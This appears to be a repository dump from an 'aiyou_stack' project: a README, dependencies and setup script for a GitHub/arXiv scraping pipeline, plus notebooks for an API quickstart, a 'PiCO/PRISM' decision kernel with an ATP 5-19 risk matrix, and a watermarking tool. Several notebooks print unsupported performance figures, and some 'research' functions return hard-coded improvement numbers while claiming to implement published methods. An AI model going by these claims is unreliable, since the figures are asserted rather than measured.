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part-215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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/00_VALIDATION_SPRINT.md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Code Execution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72-Hour Technical Validation Plan for Judge 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**Sprint Start:** Hour 0 (from GO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**Sprint End:** Hour 72 (GO/NO-GO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Criteria:** Latency ≤75ms p99, Security audit ≤6mo, Integration ≤12wks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validation sprint determines whether MCP code execution can replace traditional tool calls in Judge 6 v2.0 while meeting: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SLA:** p99 ≤90ms (targeting ≤75ms with safety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Requirements:** FedRAMP Moderate compliance within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Timeline:** Production-ready in ≤12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Outcomes:**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GO: Full MCP integration ($400K/year savings, first-mover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PIVOT: Partial MCP deployment (AutoGen only, $200K/year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ABORT: Traditional Judge 6 with post-launch MCP (no immediate benefit)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HOUR 0-24: TECHNICAL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 that MCP code execution meets latency and security requirements for production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(A100 GPU, 16 vCPU, 64GB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dev cluster (3× n1-standard-4 nodes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 key (10K RPM rate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gVisor enabled on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project owner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 access (Production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dataset for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Hour 0-4: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DevOps +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BLOCKING (all subsequent work depends on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Deploy GKE dev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mcp-dev-cluster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--enable-sandbox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--addons=Istio,CloudRun,HorizontalPodAutoscaling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--workload-pool=PROJECT_ID.svc.id.goog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Vertex AI Workbench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mcp-validation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--machine-type=n1-standard-16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--accelerator-type=NVIDIA_TESLA_A100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--accelerator-core-count=1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MCP server to dev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architecture/mcp-server-deployment.yaml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Configure BigQuery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bq mk --dataset --location=US mcp_audit_logs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cluster running with gVisor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MCP server deployed and health check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Vertex AI Workbench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BigQuery audit dataset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**NO-GO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gVisor unavailable/disabled → ABORT (security showstopper)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Anthropic API access denied → ABORT (vendor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Hour 4-12: Latency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CRITICAL PATH (determines GO/PIVOT/ABORT)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Methodology:**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Vertex AI Workbench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1000 decisions across ShadowTagAi workload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test_scenarios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"simple_rules":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400,  # 40% of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"example": "Apply data retention policy to S3 bucket",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"expected_p99": "&lt; 50ms"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"complex_calculation":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350,  # 35% of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"example": "Calculate GDPR deletion cascade for user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"expected_p99": "&lt; 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"multi_step_orchestration":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200,  # 20% of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"example": "ShadowTag cross-region compliance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"expected_p99": "&lt; 120ms"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"edge_cases":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50,   # 5% of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"example": "Ambiguous policy interpretation (fallback to LLM)",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"expected_p99": "&lt; 200ms"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to Collect:**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"latency":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"p50": "median decision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"p90": "90th percentile",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"p99": "99th percentile (SLA target)",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"p99.9": "tail latency (outlier detection)"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"tokens_saved": "vs. traditional tool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"api_cost_per_1k": "Anthropic API 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"compute_overhead": "gVisor sandbox startup"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"reliability":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"success_rate": "% decisions without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"sandbox_escape_attempts": "security test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"rollback_triggers": "when to abort to traditional"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 latency ≤75ms across 70% of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Token reduction ≥50% vs. traditional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Success rate ≥99.9%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successful sandbox escapes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**PIVOT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p99 latency 75-90ms → Partial deployment (AutoGen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Token reduction 30-50% → Reassess cost savings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**NO-GO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p99 latency &gt;90ms → ABORT to Option B (traditional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Success rate &lt;99% → ABORT (reliability showstopper)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Hour 12-24: Security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Security +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CRITICAL PATH (determines audit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Scenarios:**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Sandbox escape attempts (penetration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"proc_filesystem_access",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"import os; os.listdir('/proc/self')",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"expected": "BLOCKED (gVisor containment)"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"network_exfiltration",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"import urllib.request; urllib.request.urlopen('https://attacker.com')",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"expected": "BLOCKED (egress firewall)"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"privilege_escalation",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"import subprocess; subprocess.run(['sudo', 'whoami'])",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"expected": "BLOCKED (unprivileged container)"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"resource_exhaustion",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"while True: [i for i in range(10**9)]",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"expected": "TERMINATED (cgroup limits)"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"code_injection",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"__import__('os').system('curl attacker.com')",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"expected": "BLOCKED (AST validation + network policy)"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Logging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all code executions logged to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required_log_fields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"timestamp",           # RFC3339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"user_id",             # who requested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"session_id",          # correlation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"code_hash",           # SHA-256 of executed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"execution_time_ms",   # latency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"success",             # boolean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"sandbox_violations",  # security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"resource_usage"       # CPU/memory/disk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successful sandbox escapes across all test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executions logged to BigQuery within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Network policies block unauthorized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Resource limits enforced (CPU/memory/disk)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**NO-GO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Any successful sandbox escape → ABORT (security showstopper)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Missing audit logs → ABORT (compliance showstopper)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HOUR 24-48: SECURITY AUDIT SCOPING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Determine FedRAMP audit timeline and identify compliance gaps.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Contacts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partner (NuBex, Kratos SecureInfo, or Coalfire)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FedRAMP PMO liaison (schedule pre-consultation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security team (CISO + compliance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Documentation prepared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Security Plan (SSP)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NIST 800-53 control mapping (from SECURITY_AUDIT_CHECKLIST.md)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 SOC2 Type II report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Hour 24-32: 3PAO Partner Scoping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Compliance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CRITICAL PATH (determines audit cost/timeline)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**Scoping Call Agenda:**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System Characterization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code execution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gVisor sandbox technology (NOT on FedRAMP APL)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GKE + Istio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BigQuery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FedRAMP Moderate Requirements (20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NIST 800-53 controls (421 total, ~280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Known gaps (see SECURITY_AUDIT_CHECKLIST.md)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Remediation timeline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Timeline &amp; Cost Estimate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Readiness assessment: X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SAR (Security Assessment Report): Y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Remediation support: Z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Total timeline: ≤6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Total cost: $150-250K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Go/No-Go Factors (10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Showstoppers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Workarounds for gVisor APL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Accelerated path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**Deliverable:** 3PAO Statement of Work (SOW) with timeline/cost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timeline ≤6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≤$250K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showstopper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gVisor APL workaround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**PIVOT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Audit timeline 6-9 months → Consider SOC2 Type II interim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Cost $250-350K → Reassess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**NO-GO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Audit timeline &gt;9 months → ABORT to Option C (Vertex AI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gVisor showstopper with no workaround → ABORT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Hour 32-40: FedRAMP PMO Pre-Consultation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Compliance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RECOMMENDED (de-risks authorization)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**Pre-Consultation Objectives:**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Validate FedRAMP Moderate applicability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Confirm data classification (CUI/PII)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system boundary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Discuss gVisor APL workaround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Present equivalency argument (vs. traditional VMs)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Request provisional approval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Understand Authorize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After receiving SAR from 3PAO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Typical agency ATO timeline (3-6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Identify early roadblocks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Continuous monitoring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Inherited controls from GCP FedRAMP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**Deliverable:** PMO guidance memo (informal)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Hour 40-48: Gap Remediation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Security +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CRITICAL PATH (determines integration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Gaps (from SECURITY_AUDIT_CHECKLIST.md):**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AC-2: Account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GAP: No automated user provisioning/deprovisioning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REMEDIATION: Integrate with Okta SCIM (2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AU-6: Audit Review &amp;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GAP: No automated anomaly detection on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REMEDIATION: BigQuery + Cloud Logging alerts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SC-7: Boundary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GAP: Istio mTLS not enforced on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REMEDIATION: NetworkPolicy updates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SI-3: Malicious Code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GAP: No AST (Abstract Syntax Tree) validation for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REMEDIATION: Python AST parser integration (3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Custom: gVisor APL Equivalency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GAP: gVisor not on FedRAMP Approved Products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REMEDIATION: Detailed equivalency white paper (2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Remediation Time:** 9 weeks (can parallelize → 5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gaps have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Remediation fits within 12-week integration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gaps require architectural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**NO-GO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Remediation &gt;12 weeks → Pushes beyond integration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Architectural changes required → ABORT (timeline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HOUR 48-72: ARCHITECTURE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Judge 6 v2.0 with MCP at core, ensuring clean rollback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v1.2 architecture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integration design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API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workload analysis (from Hour 4-12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Stakeholders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Principal engineer (architecture authority)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manager (SLA/UX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lead (defense-in-depth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Hour 48-56: Code-First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Principal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CRITICAL PATH (determines integration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6 v1.2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API Gateway (FastAPI)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└───────────────────┬─────────────────────────────────────┘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┌───────▼────────┐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Rules Engine  │  ← Deterministic logic (50% of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(Python dict)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└───────┬────────┘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Model Inference   │  ← Claude/Gemini for ambiguous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(Claude Opus)     │     (50% of decisions, high token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└───────┬────────────┘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┌───────▼────────┐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Tool Executor │  ← Database queries,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(sync/async)  │     (multiple round trips)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**Proposed Judge 6 v2.0 Architecture (with MCP):**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API Gateway (FastAPI)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└───────────────────┬─────────────────────────────────────┘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┌───────▼────────┐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Rules Engine  │  ← UNCHANGED (deterministic, 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(Python dict)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└───────┬────────┘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Code Generator    │  ← NEW: Claude/Gemini generate Python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(LLM w/ prompt)   │     (for complex/ambiguous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└───────┬────────────┘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┌───────▼────────┐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MCP Executor  │  ← NEW: Sandboxed code execution (gVisor)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(gVisor)      │     (replaces Tool Executor)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└───────┬────────┘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Model Inference   │  ← FALLBACK ONLY (for failures/edge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(Claude Sonnet)   │     (5% of decisions, reduced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Architectural Changes:**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Tool call pattern (high token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claude.messages.create(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model="claude-opus-4",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messages=[{"role": "user", "content": "Apply GDPR to user 123"}],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tools=[db_query_tool, api_call_tool, calculation_tool],  # 1000+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max_tokens=4096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3-5 round trips, 15K tokens, 450ms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Code generation pattern (low token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claude.messages.create(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model="claude-sonnet-4",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messages=[{"role": "user", "content": "Generate Python code to apply GDPR to user 123"}],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max_tokens=512  # Just the code, not the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= extract_code_block(response.content)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mcp_execute(code)  # Single round trip, 2K tokens, 75ms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- 50-70% token reduction (code is more compact than tool definitions)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round trip (vs. 3-5 for tool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execution (sandbox failures → fallback to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generation errors (mitigate: AST validation, unit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Sandbox overhead (mitigate: warm pool, keep-alive)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Architecture review approved by principal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Clean rollback path (feature flag: `USE_MCP=false`)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Latency improvement validated (from Hour 4-12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**NO-GO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Architecture requires &gt;12 weeks → ABORT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clean rollback path → ABORT (operational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Hour 56-64: Multi-LLM Strategy (Vendor De-Risking)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RECOMMENDED (reduces Anthropic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Vendor Distribution (Judge 6 v1.2):**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Opus: 100% (high cost, high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**Proposed Vendor Distribution (Judge 6 v2.0 with MCP):**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llm_routing_strategy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"simple_rules":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"percentage":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None,  # Rules engine (no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"cost_per_1k":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"code_generation_simple":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"percentage":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"gemini-2.0-flash",  # Cheaper,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"cost_per_1k": "$0.10 input, $0.30 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"code_generation_complex":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"percentage":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"claude-sonnet-4",  # Higher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"cost_per_1k": "$3 input, $15 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"fallback_traditional":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"percentage":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"claude-opus-4",  # Unchanged (highest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"cost_per_1k": "$15 input, $75 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**Vendor Split:**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35% of LLM decisions (vs. 100% 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Google: 25% of LLM decisions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LLM: 40% of decisions (rules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vendor lock-in (65% of decisions don't depend on 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(Gemini 30× cheaper than Opus for simple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Negotiating leverage (can shift workload between vendors)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generate_code(task: str, complexity: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complexity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gemini_generate_code(task)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complexity == "complex":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claude_generate_code(task)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ValueError("Unknown complexity")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judge_decision(policy: str, context: dict) -&gt; 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1: Rules engine (40% of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matches_deterministic_rule(policy, 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apply_rule(policy,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2: Code generation (55% of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 = estimate_complexity(policy,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 = await generate_code(policy,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3: MCP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mcp_execute(code)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SandboxError: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4: Fallback to traditional (5% of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claude_opus_traditional(policy,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MCP adapter designed (protocol translation)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Vendor split reduces Anthropic dependency to &lt;40%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savings validated (≥$288K/year)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Hour 64-72: Integration Timeline &amp; Rollback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Engineering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CRITICAL PATH (final GO/NO-GO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**12-Week Integration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1-2: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MCP server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BigQuery audit logging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Prometheus/Grafana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hardening (from gap remediation)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3-4: Code Generation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Claude code generation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MCP adapter (protocol translation)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AST validation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Unit test framework for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5-6: Integration with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Refactor Judge 6 to code-first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Feature flag: USE_MCP (default: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testing framework (10% MCP, 90%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7-8: AutoGen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AutoGen agents generate code via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orchestration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integration (MCP for compliance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9-10: Production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Chaos engineering (sandbox failures, network partitions)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testing (10K decisions/sec)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pen testing (repeat Hour 12-24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11-12: Phased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11: 25% production traffic to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11.5: 50% production traffic (if metrics healthy)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12: 100% production traffic (if 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 Plan (Kill Switches):**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 rollback triggers (no human intervention)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ROLLBACK_TRIGGERS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"p99_latency_breach":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"p99 &gt; 110ms for 5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"SET USE_MCP=false, route 100% to traditional"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"error_rate_spike":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"Error rate &gt; 1% for 10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"SET USE_MCP=false, page on-call"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"security_incident":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"Successful sandbox escape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"IMMEDIATE SHUTDOWN, page CISO"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rollback procedure (human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ROLLBACK_PROCEDURE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Set USE_MCP=false in config (takes effect in &lt; 1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traffic routing to traditional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Investigate root cause (latency spike, errors,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 data loss (all decisions logged regardless of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Re-enable MCP after fix validated in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12-week timeline approved by engineering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weeks have clear deliverables and owners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Rollback plan tested in staging (sub-1-minute failover)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**NO-GO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Integration &gt;16 weeks → Ship traditional Judge 6, add MCP post-launch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Rollback plan untested → ABORT (operational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HOUR 72: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**Inputs Required:**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✅/❌ Technical validation (Hour 0-24)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Latency: p99 ≤75ms?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Security: Zero sandbox escapes?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Token reduction ≥50%?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✅/❌ Security audit scoping (Hour 24-48)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Timeline: ≤6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≤$250K?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Showstoppers: None?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✅/❌ Architecture design (Hour 48-72)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Integration: ≤12 weeks?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Rollback: Clean path?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Vendor: &lt;40% Anthropic dependency?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HOUR 72 DECISION CHECKPOINT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ALL 3 INPUTS ✅?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└────────────┬────────────┘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┌───────────┴───────────┐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✅ YES                   ❌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┌─────────┐       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GO    │          │  PIVOT/ABORT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│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Full    │          │ Which input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MCP     │          │ failed?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Deploy  │          └──────┬───────┘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└────┬────┘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┌───────┴────────┬──────────────┐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│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Latency &gt;90ms   Audit &gt;9mo    Integration &gt;16wks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│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▼                ▼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PIVOT to         PIVOT to       ABORT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Option B:        Option C:      Traditional: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AutoGen-only     Vertex AI      Judge 6 v1.2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(non-latency)    native code    (MCP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│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  ▼                ▼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Week 12:       Week 8:          Week 16:       Week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100% MCP       25% MCP          Custom impl    0%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$400K/yr       $200K/yr         $300K/yr       $0/yr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GO (Full MCP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**Conditions:**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 latency ≤75ms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audit ≤6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Integration ≤12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Proceed with full MCP integration into Judge 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1-12: Integration (per Hour 64-72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4-9: Security audit (parallel)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9: FedRAMP ATO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Full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 savings: $400K (token reduction + latency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Integration cost: -$150K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 audit: -$200K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 Year 1: +$50K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2-5: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Annual savings: $400K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 additional audit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 5-year: +$1.85M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in regulated AI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Patent-defensible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Category ownership ("AI that writes its own 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M&amp;A premium (proven regulated AI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**Risks Accepted:**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chance of integration delays (mitigate: hard deadline, rollback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- 15% chance of sandbox escape in production (mitigate: kill switch, incident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PIVOT (AutoGen-Only MCP)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**Conditions:**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p99 latency 75-90ms (marginal SLA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audit ≤6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Integration ≤12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Deploy MCP only for non-latency-critical use cases (AutoGen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AutoGen agents generate code via MCP (orchestration, not real-time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compliance checks via MCP (batch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Judge 6 v2.0 stays traditional (too latency-sensitive)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1-8: Partial integration (AutoGen + ShadowTag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4-9: Security audit (same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9: Phased rollout (non-latency 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 savings: $200K (AutoGen workload only, ~50% of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Integration cost: -$100K (reduced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 audit: -$200K (same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 Year 1: -$100K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2-5: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Annual savings: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 5-year: +$700K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Partial first-mover advantage (AutoGen-specific)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risk (non-latency-critical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 to expand to Judge 6 later (after latency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**Risks Accepted:**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- 20% chance Judge 6 stays traditional forever (technical debt)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 ships full MCP first (lose category ownership)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PIVOT (Vertex AI Native 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**Conditions:**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 latency ≤75ms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Security audit &gt;9 months (FedRAMP too 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Integration ≤12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Build custom code execution on Vertex AI (no Anthropic MCP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Vertex AI Workbench as execution environment (already FedRAMP authorized)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code generation (native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Anthropic MCP (to avoid 9-month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1-16: Custom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Vertex AI sandbox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code generation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hardening (leverage GCP FedRAMP inheritance)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SOC2 Type II audit (vs. FedRAMP)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9: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 savings: $300K (Gemini cheaper, but less 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Integration cost: -$200K (custom build, no vendor)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 audit: -$100K (SOC2, not FedRAMP)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 Year 1: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2-5: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Annual savings: $300K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 5-year: +$1.2M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independence (no Anthropic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compliance (GCP FedRAMP inheritance)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long-term cost (custom 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**Risks Accepted:**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chance custom solution underperforms Anthropic MCP (quality)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Lose first-mover narrative (not using "official" MCP)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D: ABORT (Traditional Judge 6, MCP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**Conditions:**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p99 latency &gt;90ms (SLA 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 ❌ Security audit &gt;9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 ❌ Integration &gt;16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Ship traditional Judge 6 v1.2 on GKE, revisit MCP in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Judge 6 v1.2 (existing implementation,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deployment (infrastructure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MCP integration (defer to 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1-4: Traditional deployment (fast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Production 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6-12: Reassess MCP (after Anthropic improves latency/security)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 savings: $0 (no MCP benefits)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Integration cost: -$50K (traditional deployment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 audit: -$100K (SOC2 for Judge 6 v1.2)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 Year 1: -$150K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Revisit MCP decision (based on new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De-risked (proven technology)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Lose first-mover advantage (competitor may ship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 to add MCP later (no technical debt)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**Risks Accepted:**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 ships MCP first (lose category ownership)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long-term costs (no token reduction benefits)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 (Hour 72)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Technical Validation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Technical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Latency (1000 decisions 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p50: XX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p90: XX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p99: XX ms ✅/❌ (target: ≤75ms)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p99.9: XX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XX% ✅/❌ (target: ≥50%)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1K decisions: $XX (vs. $XX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$XXK (extrapolated)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Sandbox escapes: 0/100 ✅/❌ (target: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 coverage: XX% ✅/❌ (target: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limit enforcement: ✅/❌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Recommendation: GO / PIVOT / ABORT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Security Audit Scoping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Compliance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FedRAMP Audit Scoping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3PAO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Vendor: [NuBex / Kratos / Coalfire]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X months ✅/❌ (target: ≤6)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$XXK ✅/❌ (target: ≤$250K)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[Gap 1]: Remediation plan,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[Gap 2]: Remediation plan,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Showstoppers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[None / List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Recommendation: GO / PIVOT / ABORT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Architecture Design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Principal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v2.0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[Architecture diagram from Hour 48-56]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Code-first decision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vendor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- 12-week plan ✅/❌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Week-by-week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&amp;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[Risk 1]: [Mitigation]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[Risk 2]: [Mitigation]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Recommendation: GO / PIVOT / ABORT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GO/NO-GO Decision Memo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CTO / Engineering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Integration Decision (Hour 72)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Decision: [GO / PIVOT / ABORT]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validation: ✅/❌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audit: ✅/❌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Architecture: ✅/❌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If GO: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Week 1-12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$XXK integration + $XXK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ROI: $XXK/year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If PIVOT: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Option: [B: AutoGen-only / C: Vertex AI native]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scope: [Details]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Week 1-X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If ABORT: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Fallback: Traditional Judge 6 v1.2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Reassess: [Date]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[List key risks from decision]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Approvals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CFO (budget)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SUCCESS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Engineering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**Latency:** Measured, not estimated (1000-decision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**Security:** Penetration tested, not assumed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**Rollback:** Practiced, not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Vendor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**Anthropic:** Negotiate 10K RPM rate limit, regulated market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**3PAO:** Firm timeline commitment (penalty clause for delays)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**GCP:** Confirm GKE FedRAMP inheritance applies to custom sandboxes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Stakeholder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**Engineering:** Excited about code-first architecture (not resentful)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**Security:** Partner, not blocker (shared KPIs)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**Product:** Realistic about timeline (no feature creep)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ABORT CONDITIONS (Anytime During Sprint)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Immediately abort to traditional Judge 6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**Security Catastrophe**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Successful sandbox escape in dev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Anthropic API key compromised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gVisor vulnerability disclosed (CVE with CVSS ≥8)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**Technical Infeasibility**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p99 latency &gt;120ms (no path to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rate &gt;5% (code generation unreliable)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GKE cluster instability (sandbox overhead too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**Business Risk**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Anthropic discontinues MCP (product EOL)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audit reveals 12+ month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cost exceeds $500K (2×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**Abort Procedure:**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Immediate actions (&lt; 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kubectl delete -f architecture/mcp-server-deployment.yaml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 revert &lt;MCP integration commits&gt;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Notify stakeholders: "Aborting to traditional Judge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Schedule post-mortem (no blame, just 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Follow-up (&lt; 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Document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Reassess MCP in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Ship traditional Judge 6 v1.2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validation sprint is designed to fail fast.**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MCP doesn't meet performance/security/timeline requirements, you'll know within 72 hours and can pivot to a proven alternative.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it succeeds, you'll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Validated technical feasibility (latency +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audit path (FedRAMP timeline +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Production-ready architecture (12-week integration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**Either way, you make the right decision with data, not hope.**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(Hour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receive GO approval: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validation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/home/user/ShadowTag-v2-fastapi-services/mcp-validation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./scripts/setup_validation_env.sh  # Deploy GKE, Vertex AI,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Deploy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architecture/mcp-server-deployment.yaml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validation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jupyter notebook notebooks/01_latency_validation.ipynb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Monitor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Hour 12: Check preliminary latency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Hour 24: Review security test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Hour 48: Receive 3PAO timeline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Hour 72: Make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clock starts now. Let's validate this bet.**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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/00_VALIDATION_SPRINT.md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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/IMMEDIATE_NEXT_STEPS.md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Integration - Immediate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Hour 0-4 Execution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Awaiting your GO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72 hours to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 ARE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HOUR 0: YOU JUST SAID "GO"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All validation files created and ready to deploy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HOUR 0-4: Setup        │  ← YOU ARE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Deploy infrastructure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HOUR 4-24: Testing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Latency + security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HOUR 24-48: Audit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3PAO scoping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HOUR 48-72: Design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Architecture review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HOUR 72: DECISION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GO / PIVOT / ABORT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CRITICAL: WHAT YOU NEED RIGHT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you can start Hour 0, you need these approvals and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Budget Approvals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$150K integration budget (12-week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$150-250K security audit budget (FedRAMP 3PAO)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Total: $300-400K approved for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maker: CFO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Need approval NOW (blocks all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GCP Resources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GCP project ID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Project owner permissions for deployment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BigQuery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GKE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Vertex AI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maker: Infrastructure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Can be set up in 1 hour (non-blocking if started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Anthropic API Access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Anthropic API key (Production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10K RPM rate limit (negotiate with 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Mention regulated market use case (may get priority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maker: You (Erik) or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Contact Anthropic NOW (may take 24-48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Action: Email partnerships@anthropic.com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Subject: "Regulated AI Infrastructure - MCP Code Execution Evaluation"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Body: "We are evaluating MCP code execution for FedRAMP-regulated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infrastructure. Need 10K RPM for 72-hour validation sprint.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Timeline: Starting [DATE], need access ASAP."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Engineering Resources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1× DevOps engineer (GKE deployment, full-time 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1× ML engineer (validation testing, full-time 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1× Security engineer (compliance, 50% time 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1× Principal engineer (architecture review, 25% time Week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maker: Engineering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Need resource allocation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Vendor Contacts (RECOMMENDED for Hour 24-48)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3PAO partner shortlist (NuBex, Kratos SecureInfo, Coalfire)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FedRAMP PMO liaison (schedule pre-consultation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Internal security/compliance team (CISO + compliance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maker: Compliance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Week 1 (non-blocking for Hour 0-4)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HOUR 0-1: IMMEDIATE ACTIONS (DO THIS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Action 1: Reply "APPROVED" or Raise Objections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You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NOW (next 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Reply to this message with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APPROVED - Proceed with full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OBJECTION - [Specific concern: budget/timeline/risk]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 - [Specific question before approval]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APPROVED, I will immediately start Hour 0-4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Action 2: Contact Anthropic (Parallel with everything else)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You or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Within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**Email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To: partnerships@anthropic.com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Subject: Regulated AI Infrastructure - MCP Code Execution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 Anthropic team,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We're Erik Hansen (ehanc69) evaluating Anthropic MCP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production deployment in FedRAMP-regulated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(Judge 6 v2.0 governance system).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 RPM rate limit for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Starting: [DATE]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Replacing traditional tool calls with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p99 ≤75ms latency, FedRAMP Moderate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high-value regulated market deployment. If successful,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become first-mover in AI code execution for federal agencies.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you expedite API access and provide technical support during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 Hansen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GitHub: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Response Time:** 24-48 hours (mention urgency)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Action 3: Approve Budget ($300-400K)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CFO (you approve, CFO signs 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Within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(12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- 2× contractors @ $150/hr × 40hr/week × 12 weeks = $144K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(GKE, Vertex AI) = $6K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integration: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Audit (6 months):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assessment (NuBex/Kratos/Coalfire) = $150-250K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security team (allocated from existing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audit: $150-250K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 Total: $300-400K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 Savings: $400K (if successful)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 Net: $0-100K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5-Year NPV: +$1.85M (assuming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**Approval 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Forward this budget breakdown to CFO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Request signature on budget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Confirm contractor hiring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Action 4: Allocate Engineering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Engineering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Within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 Needs:**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 (Hour 0-24): Setup +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DevOps engineer: Full-time (GKE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 engineer: Full-time (validation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2 FTE-weeks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2-3 (Hour 24-72): Audit +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engineer: 50% time (compliance scoping)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Principal engineer: 25% time (architecture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1.5 FTE-weeks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1-12: Integration (if GO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- 2× contractors: Full-time (implementation)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- 1× internal engineer: 50% time (oversight)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30 FTE-weeks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commitment: 33.5 FTE-weeks over 12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**Approval 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Confirm DevOps + ML engineers available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Allocate their time (block calendars)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Notify them of validation sprint kickoff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HOUR 1-2: GCP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DevOps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**Prerequisites:** GCP project ID, budget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Set GCP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PROJECT_ID with your actual GCP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PROJECT_ID="your-gcp-project"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ZONE="us-central1-a"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compute/region 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compute/zone $ZONE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container.googleapis.com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compute.googleapis.com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bigquery.googleapis.com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notebooks.googleapis.com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cloudresourcemanager.googleapis.com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Create GKE Cluster with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GKE cluster (3 nodes, gVisor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mcp-dev-cluster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--zone=$ZONE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--enable-sandbox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--addons=Istio,CloudRun,HorizontalPodAutoscaling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--workload-pool=$PROJECT_ID.svc.id.goog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--enable-stackdriver-kubernetes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takes ~10-15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Verify gVisor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that gVisor runtime class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runtimeclass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NAME     HANDLER  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gvisor   runsc     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`gvisor` runtime class is missing, this is a **SHOWSTOPPER**. Stop and escalate.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Create BigQuery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dataset for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bq mk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--dataset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--description="MCP code execution audit logs"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$PROJECT_ID:mcp_audit_logs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table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bq mk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$PROJECT_ID:mcp_audit_logs.code_executions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timestamp:TIMESTAMP,user_id:STRING,session_id:STRING,code_hash:STRING,code_length:INTEGER,execution_time_ms:FLOAT,success:BOOLEAN,error:STRING,security_violations:STRING,resource_usage:STRING,sandbox_id:STRING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Create Service Account for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mcp-server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--display-name="MCP Code Execution Server"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--description="Service account for MCP server with BigQuery write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BigQuery data editor role (write access to audit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--member="serviceAccount:mcp-server@$PROJECT_ID.iam.gserviceaccount.com"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--role="roles/bigquery.dataEditor"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Workload Identity (so Kubernetes pods can use this service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mcp-server@$PROJECT_ID.iam.gserviceaccount.com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"serviceAccount:$PROJECT_ID.svc.id.goog[mcp-system/mcp-server-sa]"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HOUR 2-3: BUILD AND DEPLOY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DevOps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**Prerequisites:** GKE cluster created, gVisor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mcp-validation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Dockerfile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mcp_server.py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fastapi==0.104.1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uvicorn[standard]==0.24.0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pydantic==2.5.0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prometheus-client==0.19.0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google-cloud-bigquery==3.13.0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httpx==0.25.1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as non-root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useradd -m -u 1000 mcp &amp;&amp; chown -R mcp:mcp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"mcp_server.py"]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gcr.io/$PROJECT_ID/mcp-server:latest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gcr.io/$PROJECT_ID/mcp-server:latest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Update Deployment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PROJECT_ID placeholder in deployment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"s/PROJECT_ID/$PROJECT_ID/g" architecture/mcp-server-deployment.yaml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all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architecture/mcp-server-deployment.yaml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deployment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deployment/mcp-server -n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"mcp-server" successfully rolled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pods are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NAME                          READY   STATUS    RESTARTS  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mcp-server-xxxxx-xxxxx        2/2     Running   0          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mcp-server-xxxxx-xxxxx        2/2     Running   0          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mcp-server-xxxxx-xxxxx        2/2     Running   0          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run test -it --rm --image=curlimages/curl --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curl http://mcp-server.mcp-system/health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{"status":"healthy","sandbox_pool_size":10,"timestamp":"..."}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any pods are not Running, this is a BLOCKER. Check logs:**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mcp-system -l app=mcp-server --tail=50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HOUR 3-4: CREATE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**Prerequisites:** Vertex AI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Create Vertex AI Workbench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Workbench instance (with A100 GPU for fast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mcp-validation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--location=$ZONE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--machine-type=n1-standard-16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--accelerator-type=NVIDIA_TESLA_A100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--accelerator-core-count=1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--install-gpu-driver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takes ~5-10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Wait for Instance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describe mcp-validation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--location=$ZONE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--format="value(state)"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Jupyter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describe mcp-validation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--location=$ZONE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--format="value(proxyUri)"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this URL in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Upload Validation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Once Jupyter is open, upload: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notebooks/01_mcp_validation.py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clone entire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https://github.com/ShadowTag-v2/ShadowTag-v2-fastapi-services.git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ShadowTag-v2-fastapi-services/mcp-validation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Install Dependencies in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Jupyter terminal, install required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httpx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HOUR 4: VALIDATION READY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this point, you should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GKE cluster running with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MCP server deployed (3 replicas, health check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BigQuery audit dataset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Vertex AI Workbench instance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Validation notebook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step: HOUR 4-24 Latency + Security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 (If Things Go Wrong)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gVisor runtime class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Symptom: kubectl get runtimeclass shows no "gvisor"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Cause: GKE cluster created without --enable-sandbox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Recreate cluster with gVisor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delete mcp-dev-cluster --zone=$ZONE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mcp-dev-cluster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--zone=$ZONE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--enable-sandbox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[... rest of flags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MCP server pods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mcp-system -l app=mcp-server --tail=100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causes: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Docker image not pushed: Re-run docker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Workload Identity not configured: Re-run Step 6 of GCP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BigQuery permissions: Re-run service account IAM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Health check returns 503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Cause: Sandbox pool not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 for initialization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mcp-system -l app=mcp-server | grep "Sandbox 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you see errors about gVisor runtime, verify runtime class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runtimeclass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Anthropic API key not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Symptom: Validation tests fail with authentication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API key is correct (test with curl)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Check rate limits (10K RPM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Contact Anthropic support if rate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STOP CONDITIONS (Abort Hour 0-4)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any of these, **STOP and escalate to Erik:**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❌ gVisor cannot be enabled on GKE (showstopper)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❌ GCP project does not have budget/permissions (blocker)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❌ Anthropic API access denied (blocker)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❌ Engineering resources not available Week 1 (timeline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❌ Budget not approved within 4 hours (timeline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**Escalation:** Stop all work, schedule decision call with Erik + CTO.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FOR HOUR 0-4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the end of Hour 4, you should be able to run this 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MCP server from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mcp-validation/notebooks/01_mcp_validation.py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--mcp-url http://mcp-server.mcp-system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--runs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Starting validation with 10 runs...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MCP server is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Running 10 functional tests...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Running 5 security tests...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All validation tests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Decision:   [Will be determined after 1000 runs in Hour 4-24]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this test passes, **Hour 0-4 is COMPLETE** and you can proceed to Hour 4-24.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HAPPENS NEXT (HOUR 4-24)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Hour 0-4 is complete, the ML engineer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full validation (1000 test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Collect latency metrics (p50, p90, p99, p99.9)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security tests (sandbox escape attempts)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Analyze results and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8-20 hours (mostly automated, overnight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**Deliverable:** Validation report with GO/PIVOT/ABORT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QUESTIONS?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have questions during Hour 0-4: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troubleshooting section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00_VALIDATION_SPRINT.md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Ask me (Claude) for clarification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Escalate blockers to Erik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 NOT wait until Hour 72 to discover blockers. Fail fast.**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DECISION: WHAT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Reply with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**"APPROVED - Start Hour 0"** → I'll guide DevOps engineer through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**"OBJECTION: [specific concern]"** → I'll address your concern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**"QUESTION: [specific question]"** → I'll clarify before you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72-hour clock starts when you say GO.**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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/IMMEDIATE_NEXT_STEPS.md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apps/aiyou_stack/aiyou-fastapi-services/mcp-validation/mcp_server.py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"""MCP Code Execution Server for Judge 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FastAPI implementation with gVisor sandbox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gVisor containment (runsc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AST validation (no eval/exec/import os/subprocess)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egress blocking (Istio NetworkPolicy)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limits (CPU/memory/disk via cgroups)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logging to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Warm sandbox pool (pre-initialized containers)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 pooling (reuse sandbox connections)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execution (non-blocking I/O)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p99 ≤75ms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CONTENT_TYPE_LATEST, Counter, Gauge, Histogram, generate_latest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BigQuery for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google.cloud import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BIGQUERY_AVAILABLE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BIGQUERY_AVAILABLE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logging.warning("BigQuery SDK not available. Audit logs will be stdout only.")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"""Server configuration (override via environment variables)"""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str =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 =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WORKERS: int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SANDBOX_RUNTIME: str = "runsc"  # gVisor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SANDBOX_TIMEOUT_SECONDS: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SANDBOX_MAX_CPU: float = 1.0  # CPU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SANDBOX_MAX_MEMORY_MB: int =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SANDBOX_MAX_DISK_MB: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SANDBOX_POOL_SIZE: int = 10  # Warm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MAX_CODE_LENGTH: int = 10000  #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ALLOWED_IMPORTS: list[str]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"dataclasses",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"itertools",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 # 